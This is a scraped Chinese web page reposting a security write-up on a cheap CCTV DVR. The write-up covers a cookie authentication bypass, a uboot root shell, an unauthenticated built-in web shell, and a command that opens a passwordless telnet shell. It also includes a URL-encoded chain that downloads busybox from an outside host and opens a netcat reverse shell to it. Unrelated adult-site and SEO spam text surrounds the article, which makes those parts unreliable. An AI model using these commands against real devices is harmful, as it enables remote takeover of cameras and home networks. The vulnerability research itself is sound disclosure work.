精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

閉路電視探頭究竟有多不安全?

安全 終端安全
閉路電視探頭在我們的生活中無所不在。最近的調(diào)查估計(jì)全英國大概有185萬的監(jiān)控?cái)z像頭,大部分都在私人住宅。大部分的探頭都會連接到某些錄像設(shè)備,也就是數(shù)字錄像機(jī)(DVR)。

閉路電視探頭在我們的生活中無所不在。最近的調(diào)查估計(jì)全英國大概有185萬的監(jiān)控?cái)z像頭,大部分都在私人住宅。大部分的探頭都會連接到某些錄像設(shè)備,也就是數(shù)字錄像機(jī)(DVR)。

閉路電視探頭究竟有多不安全?

DVR會把多個(gè)攝像頭的錄像儲存到一個(gè)硬盤上。它們不僅能夠在屏幕上顯示圖片,大部分還能聯(lián)網(wǎng),用戶可以通過瀏覽器或者客戶端來連接。

當(dāng)然商家和戶主都會想要遠(yuǎn)程進(jìn)入DVR,DVR設(shè)備通過端口轉(zhuǎn)發(fā)連接到互聯(lián)網(wǎng),也正因?yàn)槿绱耍覀兛梢栽赟hodan上找到大量的DVR設(shè)備。

所以我們打算買個(gè)廉價(jià)的DVR,看看還會不會有更加糟糕的情況。

閉路電視探頭究竟有多不安全?

 

經(jīng)過幾小時(shí)的挖掘我們便發(fā)現(xiàn)了以下的問題:

容易被找到

這款DVR會運(yùn)行一個(gè)客戶web服務(wù)器,它的HTTP服務(wù)器頭很具標(biāo)志性:“JAWS/1.0”。在Shodan上搜索這個(gè)關(guān)鍵字我們找到44,000個(gè)設(shè)備。

閉路電視探頭究竟有多不安全?

 

弱口令問題

默認(rèn)情況下,這款設(shè)備的用戶名是admin,密碼為空。

閉路電視探頭究竟有多不安全?

 

連接電視后使用DVR的本地界面就可以更改密碼。但設(shè)備中沒有鍵盤,所以可以肯定大量的這款DVR使用的是默認(rèn)密碼。

雖然弱口令已經(jīng)是老掉牙的問題了,但是還是物聯(lián)網(wǎng)領(lǐng)域中普遍的問題。

Web驗(yàn)證繞過

首次訪問DVR的時(shí)候顯示的是index.html頁面,這個(gè)頁面可以讓你輸入用戶名密碼,驗(yàn)證成功后,你就會被重定向到view2.html。

奇怪的是,當(dāng)我們清空cookies,訪問view2.html時(shí),我們看到頁面渲染了一下,然后再把我們重定向到index.html讓我們輸密碼。

這基本上就是JavaScript客戶端驗(yàn)證的標(biāo)志了。檢查view2.js,我們發(fā)現(xiàn)是這樣的:

  1. $(document).ready(function(){  
  2. dvr_camcnt =Cookies.get(“dvr_camcnt");  
  3. dvr_usr =Cookies.get("dvr_usr");  
  4. dvr_pwd =Cookies.get("dvr_pwd");  
  5. if(dvr_camcnt ==null || dvr_usr == null || dvr_pwd == null)  
  6. {  
  7. location.href= "/index.html";  
  8. }  
  9.  

只要這三個(gè)cookie有任意值,你就可以訪問了(dvr_camcnt得是2、4、8或24)。

 

手動設(shè)置這些cookie我們就能訪問了。也就是說,我們無需知道用戶名密碼。

閉路電視探頭究竟有多不安全?

 

打開串號控制臺

雖然拿到Web界面控制已經(jīng)很好玩了,但我還要root shell。

打開機(jī)器上面的蓋子之后,我們發(fā)現(xiàn)了J18。這是個(gè)115200串口,雖然我能看到輸出,但是沒有shell,也沒地方輸入。

重啟設(shè)備后我們發(fā)現(xiàn)它使用的是uboot,這是一款非常常見的開源boot loader。按任意鍵就能中斷uboot。不過你只有一秒鐘中斷uboot,所以可能得多嘗試幾次。

我們現(xiàn)在就進(jìn)入了uboot控制臺。我們可以修改啟動參數(shù),改為單用戶模式,我們就無需密碼登陸了。

setenv bootargs ${bootargs) single
boot

現(xiàn)在DVR就進(jìn)入了單用戶模式,我們也有了root shell,我們可以做點(diǎn)猥瑣的事了。

內(nèi)置web shell

本地root shell不錯(cuò),但我還想要遠(yuǎn)程shell。

查看固件后我們發(fā)現(xiàn),大部分的功能都是在dvr_app里面的,包括web服務(wù)器。盡管web界面中有cgi-bin目錄,但我在文件服務(wù)器上沒找到這個(gè)目錄,有可能dvr_app在內(nèi)部處理了這個(gè)目錄。這樣的情況在嵌入設(shè)備中非常普遍。

對這個(gè)二進(jìn)制文件使用strings命令,就能看到cgi-bin了。而且我們還看到了其他的值,包括moo和shell。

閉路電視探頭究竟有多不安全?

 

訪問moo目錄是這么個(gè)情況:

閉路電視探頭究竟有多不安全?

 

訪問shell目錄會一直加載,但訪問shell?ps時(shí)就能看到進(jìn)程列表了:

閉路電視探頭究竟有多不安全?

 

因此我們就拿到了一個(gè)遠(yuǎn)程,并且無需認(rèn)證的shell,這個(gè)shell無法禁止,是設(shè)備里面自帶的。

無需密碼登錄Telnet

設(shè)備在23端口運(yùn)行telnet,但需要root密碼。即使我們能夠看到/etc/passwd和解密hash,我們還是拿不到密碼。

閉路電視探頭究竟有多不安全?

 

我們通過密碼破解器看看能不能拿到密碼,但這要花點(diǎn)時(shí)間。

為了解決這個(gè)問題,我們使用遠(yuǎn)程web shell開啟一個(gè)新的已經(jīng)登錄的telnet daemon:

http://192.168.3.101/shell?/usr/sbin/telnetd -l/bin/sh -p 25

現(xiàn)在我們可以登錄telnet了。

閉路電視探頭究竟有多不安全?

 

反彈shell

攻擊者可以用反彈shell讓DVR反向連接到他所控制的主機(jī)。只要用戶有出口連接,這招就很管用,這是繞過NAT和防火墻的好辦法。家庭企業(yè)和小型企業(yè)網(wǎng)絡(luò)大多不會進(jìn)行出站的過濾。

一般我們會用netcat建立反彈shell。跟其他小型嵌入式設(shè)備一樣,這款DVR使用busybox來提供發(fā)亮的shell功能。這些命令是任意的。很遺憾netcat不能用,但我們可以解決。

DVR使用的是ARM處理器。也就是說基本上不可能直接下載netcat或busybox了,我們得進(jìn)行編譯。

為嵌入式系統(tǒng)進(jìn)行編譯很尷尬的,尤其是你得要跟硬件交互的時(shí)候。還好busybox和netcat的要求不多。我們只需要為架構(gòu)創(chuàng)建靜態(tài)鏈接二進(jìn)制。這個(gè)得是要靜態(tài)鏈接的,這樣就能避免對庫的依賴。這樣會使二進(jìn)制文件變大,不過這款設(shè)備上沒有磁盤空間挺寬裕。

編譯完成后我們就拿到DVR上試試。

找一個(gè)可寫目錄。大部分的文件系統(tǒng)都是只讀的,你甚至無法更改密碼添加用戶。這畢竟是個(gè)DVR,所以我們弄了個(gè)硬盤,加載在/root/rec/a1下。

用wget下載編譯的busybox二進(jìn)制到這個(gè)目錄

把busybox設(shè)為可執(zhí)行

運(yùn)行netcat反彈shell

命令如下:

http://192.168.3.101/shell?cd /root/rec/a1 && wget%68%74%74%70%3a%2f%2f%32%31%32%2e%31%31%31%2e%34%33%2e%31%36%31%2f%62%75%73%79%62%6f%78%20 && chmod %2bx busybox&& ./busybox nc 1.2.3.4 8000 -e /bin/sh -e /bin/sh

Wget的網(wǎng)址得要經(jīng)過編碼,實(shí)際的網(wǎng)址是:

http://1.2.3.4/busybox

我們服務(wù)器上的netcat就監(jiān)聽到一個(gè)連接了,通過訪問構(gòu)造好的URL我們就可以與DVR進(jìn)行交互了。

閉路電視探頭究竟有多不安全?

 

發(fā)送截屏至硬編碼的郵箱

進(jìn)一步檢查dvr_app二進(jìn)制,我們發(fā)現(xiàn)了一些很奇怪的功能。

閉路電視探頭究竟有多不安全?

 

不知道為何,第一個(gè)攝像頭的截屏?xí)话l(fā)送到lawishere@yeah.net。

發(fā)送DVR截屏的行為嚴(yán)重威脅到了隱私。

而且奇怪的是,有人曾經(jīng)在Frank Law的GitHub頁面上報(bào)告過這一情況:

https://web.archive.org/web/20151010191622/https://github.com/lawishere/JUAN-Device/issues/1

然后他撤下了這個(gè)項(xiàng)目。

其他問題

事情到此并沒有完全結(jié)束。這款設(shè)備還有其他的問題:

如果你通過web服務(wù)器獲得了shell或者命令注入,你就沒必要提權(quán)了,你已經(jīng)是root了。

這款設(shè)備沒有CSRF保護(hù),你可以誘騙用戶點(diǎn)擊鏈接,就能以他們的身份執(zhí)行動作。

沒有帳號鎖定或者防爆破措施。你可以一直猜密碼下去,唯一的限制頻率的就是設(shè)備本身的運(yùn)行速度。

沒有HTTPS。所有通信都是以明文方式發(fā)送,可以被攔截,可以被篡改。

沒有固件升級

我們的建議

把這些設(shè)備放到互聯(lián)網(wǎng)上,你就會面臨嚴(yán)重的安全風(fēng)險(xiǎn)。如果你把web界面端口轉(zhuǎn)發(fā),你就等于讓攻擊者完全控制這個(gè)設(shè)備。然后他們還可以以此作為跳板從內(nèi)部攻擊你網(wǎng)絡(luò)中的其他設(shè)備。

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
相關(guān)推薦

2021-10-28 11:48:17

WiFi網(wǎng)絡(luò)網(wǎng)絡(luò)安全WiFi嗅探

2020-01-14 09:40:10

網(wǎng)絡(luò)安全黑客互聯(lián)網(wǎng)

2018-08-10 14:29:53

云服務(wù)云計(jì)算操作系統(tǒng)

2011-08-25 12:51:02

2015-07-01 14:48:51

2018-01-12 20:00:58

2012-04-16 10:12:54

Java線程

2009-08-03 16:58:59

C#不安全代碼

2024-01-19 08:42:45

Java線程字符串

2020-11-03 12:32:25

影子物聯(lián)網(wǎng)物聯(lián)網(wǎng)IOT

2020-04-22 20:35:02

HashMap線程安全

2021-04-04 23:16:52

安全刷臉銀行

2023-06-01 19:24:16

2014-09-12 17:44:23

2014-04-09 09:37:29

2021-10-15 10:05:04

物聯(lián)網(wǎng)安全設(shè)備

2009-11-18 10:05:13

2010-08-16 10:01:01

2021-12-08 07:31:40

Linux安全病毒

2009-11-12 08:38:34

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

澳门久久精品| 精品一性一色一乱农村| 青青草成人在线观看| 色偷偷噜噜噜亚洲男人| 91网址在线观看精品| mm视频在线视频| 国产网站一区二区三区| 成人性教育视频在线观看| 久视频在线观看| 久久av免费看| 91精品国产综合久久久久久| 欧美 国产 综合| 香蕉视频免费在线播放| 不卡一区二区中文字幕| 国产精品视频网站| 国产一级片免费| 日韩欧美一区二区三区免费看| 日韩一区二区三区免费看| 黄色免费观看视频网站| 91精品国产91久久久久久青草| 久久综合九色综合97婷婷女人 | 精品国一区二区三区| 成人黄色片视频| 亚洲精品白浆| 国产精品午夜春色av| 国语精品免费视频| 国产欧美日韩成人| 日本欧美在线观看| 18一19gay欧美视频网站| 手机在线免费看片| 凹凸成人精品亚洲精品密奴| 亚洲成成品网站| 色网站在线视频| 日韩三级影视| 婷婷亚洲久悠悠色悠在线播放| 中文字幕欧美日韩一区二区三区 | 成人毛片视频在线观看| 成人国产精品一区二区| 国产成人无码一区二区在线播放| 狠狠噜噜久久| 免费不卡在线观看av| 美国精品一区二区| 国产一区99| 亚洲欧美日韩在线高清直播| 欧美夫妇交换xxx| 免费精品一区| 日韩一区二区精品葵司在线 | 日韩欧美国产亚洲| 国内揄拍国内精品久久| 欧美成人午夜免费视在线看片| 国产麻豆a毛片| 欧美日韩中文字幕一区二区三区| 亚洲欧美国产另类| 三级黄色片网站| 韩国精品福利一区二区三区| 日韩精品一区二区三区视频在线观看| www.51色.com| 日韩欧美高清一区二区三区| 欧美一二三区在线观看| 欧美一级小视频| 99视频有精品高清视频| 欧美日韩一区二区三区高清| 国产又大又黄又粗的视频| 三上悠亚一区二区| 91福利精品视频| 日本人视频jizz页码69| 色999韩欧美国产综合俺来也| 欧美日韩久久久| 99国产精品久久久久久| 四虎影视国产精品| 日韩欧美激情一区| 国产69视频在线观看| 红杏成人性视频免费看| 亚洲欧美日本另类| 久久久久久国产免费a片| 第一会所亚洲原创| 永久555www成人免费| 自拍偷拍第9页| 小处雏高清一区二区三区| 超碰日本道色综合久久综合| 欧美成人精品欧美一| 狠狠爱成人网| 国产福利精品视频| 亚洲中文字幕一区二区| 国产超碰在线一区| 久久国产主播精品| eeuss影院www在线播放| 国产精品国产精品国产专区不蜜| 国产精品av免费观看| 高清电影在线免费观看| 欧美视频在线观看免费| 天天干天天玩天天操| 日韩精品成人在线观看| 亚洲精品二三区| 欧美亚洲色综久久精品国产| 一区二区三区在线| 日本精品久久久久久久| 国产毛片毛片毛片毛片毛片| www.日韩av| 日韩中文不卡| 美女91在线| 欧美唯美清纯偷拍| 国产69视频在线观看| 日本久久一二三四| 欧美区在线播放| 亚洲婷婷久久综合| 国产91色综合久久免费分享| 日韩欧美第二区在线观看| 18videosex性欧美麻豆| 在线国产电影不卡| 亚洲视频 中文字幕| 欧美码中文字幕在线| 欧美丰满少妇xxxxx| 日韩精品成人免费观看视频| 国产成人无遮挡在线视频| 日本在线视频不卡| 国产偷倩在线播放| 51精品视频一区二区三区| www.自拍偷拍| 亚洲国产专区| 91亚洲精品在线| 国产视频第一区| а√中文在线8| 国产欧美一区在线| 鲁一鲁一鲁一鲁一色| 日日夜夜亚洲精品| 亚洲视频网站在线观看| 国产精品.www| 国产美女精品人人做人人爽| 日韩精品伦理第一区| 97天天综合网| 欧美成人bangbros| 极品色av影院| 久久se精品一区二区| 欧美亚洲一级二级| 123区在线| 精品欧美久久久| 中文字幕在线观看2018| 日韩专区中文字幕一区二区| 久久久免费看| 蜜桃av在线| 亚洲国产高清高潮精品美女| 欧美日韩精品在线观看视频 | 日产午夜精品一线二线三线| 91福利视频网| 青青青免费视频在线2| 亚洲成人综合在线| 深夜视频在线观看| 国产综合亚洲精品一区二| 成人精品一区二区三区电影黑人| av资源在线观看免费高清| 在线中文字幕一区| 18精品爽国产三级网站| 日本系列欧美系列| 亚洲午夜精品一区二区三区| 国产极品一区| 久久精品成人动漫| 国产精品无码久久av| 一区二区视频在线看| 无码人妻一区二区三区精品视频| 亚洲一级二级| 久久综合久久久| 电影亚洲一区| 成年无码av片在线| 日本精品久久久久久| 香蕉成人伊视频在线观看| 好吊一区二区三区视频| 久久狠狠一本精品综合网| 日韩在线电影一区| 精品999日本久久久影院| 欧美黑人xxx| 三级av在线| 欧美又粗又大又爽| 永久免费看mv网站入口| 国产成人精品亚洲日本在线桃色 | 国内高清免费在线视频| 日韩电影免费观看在线观看| caoporn国产| 国产精品家庭影院| 国产男女无遮挡猛进猛出| 综合激情婷婷| 成人激情视频在线播放| caopeng在线| 精品精品国产高清一毛片一天堂| 国产成人无码精品| 久久久久国产精品人| 成人在线免费播放视频| 日韩精品2区| 成人激情视频网| 黄色在线网站噜噜噜| 亚洲男人天堂久| 最近日韩免费视频| 亚洲蜜臀av乱码久久精品 | 超碰国产精品一区二页| 久久国产加勒比精品无码| 亚洲精品一级片| 欧美日韩国产色视频| 婷婷丁香综合网| 国产mv日韩mv欧美| 成人在线看视频| 午夜久久免费观看| 不卡日韩av| yiren22亚洲综合| 九九久久精品一区| 色网站在线免费观看| 91久久人澡人人添人人爽欧美| 91精品国产高清一区二区三蜜臀| 91视视频在线观看入口直接观看www | 在线观看毛片网站| 一区二区高清视频在线观看| 精品国产一区在线| 免费观看在线综合| 日韩黄色短视频| 色无极亚洲影院| 亚洲综合在线播放| 精品123区| 97视频免费观看| 国产精品久久久久久久龚玥菲| 日韩一区二区三区免费看| av图片在线观看| 亚洲日本在线a| 国产18无套直看片| 97超碰欧美中文字幕| 亚欧美一区二区三区| 国产精品日韩欧美一区| 激情五月婷婷六月| 久久久人成影片免费观看| 久久久久免费网| 疯狂欧洲av久久成人av电影 | 亚洲在线色站| 国产成人三级| 岛国视频一区| 四虎精品一区二区免费| 欧美夜福利tv在线| 毛片av免费在线观看| 最新国产一区| 91情侣在线视频| 日韩另类视频| 97精品国产97久久久久久| 欧美xxxx黑人又粗又长| 久久精品中文字幕电影| 国产三级在线看| 精品亚洲精品福利线在观看| 人妻视频一区二区三区| 欧美一区欧美二区| 亚洲一二区视频| 日本黄色一区二区| 精品视频一二三区| 欧美午夜www高清视频| 国产精品白浆一区二小说| 亚洲免费看黄网站| 在线观看亚洲大片短视频| 国产欧美1区2区3区| 精品少妇人妻一区二区黑料社区| 成人av在线一区二区| 日本人69视频| 精品午夜久久福利影院| 亚洲综合色在线观看| 蜜桃视频一区| 国产在线播放观看| 美女尤物久久精品| 国产精品www网站| 国产成人在线免费视频| 亚洲激情在线激情| 国产va在线播放| 亚洲精品一二三| 免费毛片在线播放免费| 一区二区三区不卡视频| 精品欧美一区二区久久久久| 亚洲黄网站在线观看| avtt天堂在线| 亚洲一区二区三区在线播放| 免费一级片视频| 亚洲高清中文字幕| 中文字幕xxxx| 欧美无乱码久久久免费午夜一区| 又骚又黄的视频| 欧美性一二三区| 国产农村妇女毛片精品| 日韩精品一区二区三区在线播放| 手机在线不卡av| 亚洲天堂av综合网| 色视频在线免费观看| 久久久av亚洲男天堂| 日本高清成人vr专区| 5252色成人免费视频| 精品视频在线一区二区在线| 国产一区深夜福利| 久久av影院| 国产欧美亚洲日本| 国产不卡av一区二区| 亚洲高清资源综合久久精品| 66视频精品| 亚洲精品无码久久久久久| 日韩激情在线观看| 国产传媒免费观看| 丁香婷婷综合激情五月色| 性欧美一区二区| 亚洲色图制服丝袜| 日韩久久精品视频| 欧美一区二区三区视频免费| 免费的黄色av| 国产亚洲福利一区| 91破解版在线观看| 国产成人在线一区| 久久综合给合| 欧美午夜视频在线| 国产字幕视频一区二区| 日本男人操女人| 成人激情综合网站| √天堂中文官网8在线| 狠狠色狠狠色综合日日五| 中文字幕一区二区三区四区视频| 日韩国产在线播放| 九色porny丨首页在线| 欧美在线视频播放| 国产福利资源一区| 亚洲一区二区精品在线| 国产日韩精品视频一区二区三区| 最新天堂在线视频| 91看片淫黄大片一级在线观看| 91香蕉视频在线播放| 精品久久久久久久久中文字幕| 国产av无码专区亚洲av| 亚洲视频在线观看| mm视频在线视频| 成人av片网址| 91综合久久一区二区| 国产精品69页| 成人av电影在线| 手机在线免费看毛片| 色噜噜狠狠色综合欧洲selulu| 国产免费高清视频| 日韩中文字幕网址| 欧美国产日韩电影| 欧美在线一二三区| 久久免费黄色| jlzzjizz在线播放观看| 一区二区三区在线观看国产| av中文字幕免费在线观看| 日韩中文av在线| 成人视屏在线观看| 日韩免费av电影| 久久香蕉精品| 人人妻人人澡人人爽人人精品 | 日本一区二区网站| 欧美一级二级在线观看| 加勒比一区二区三区在线| 欧亚精品中文字幕| 国产精品视屏| 国产freexxxx性播放麻豆| 不卡大黄网站免费看| 久草视频在线资源站| 日韩视频一区二区三区在线播放 | 18国产精品| 超碰人人爱人人| 成人午夜短视频| 国产精品成人国产乱| 88在线观看91蜜桃国自产| av网址在线| 97超级碰碰| 国产一区视频在线观看免费| 国产一线在线观看| 午夜亚洲福利老司机| 五月天激情婷婷| 国产精品视频在线观看| 精品一区二区三| 人人爽人人av| 亚洲色图.com| www.亚洲欧美| 性色av一区二区咪爱| 少妇精品久久久| 国产视频一区二区三区在线播放 | 999亚洲国产精| 国产麻豆xxxvideo实拍| 欧美日韩日本国产| 涩涩视频在线观看免费| 热99精品只有里视频精品| 欧美日韩水蜜桃| 亚洲精品综合在线观看| 最新中文字幕一区二区三区| 精品国产九九九| 韩国欧美亚洲国产| 精品国产精品国产偷麻豆| 免费一级特黄录像| 国产精品理论在线观看| 国产三级按摩推拿按摩| 国产69久久精品成人| 成人免费在线播放| 一级黄色高清视频| 欧美三级xxx| 欧美成人精品一区二区男人看| 亚洲va国产va天堂va久久| 国产精品嫩草99av在线| 2017亚洲天堂| 欧美成人vps| 日本一区二区三区中文字幕| 无码人妻少妇伦在线电影| 久久久久久久久久久久久女国产乱| 99国产精品久久久久99打野战|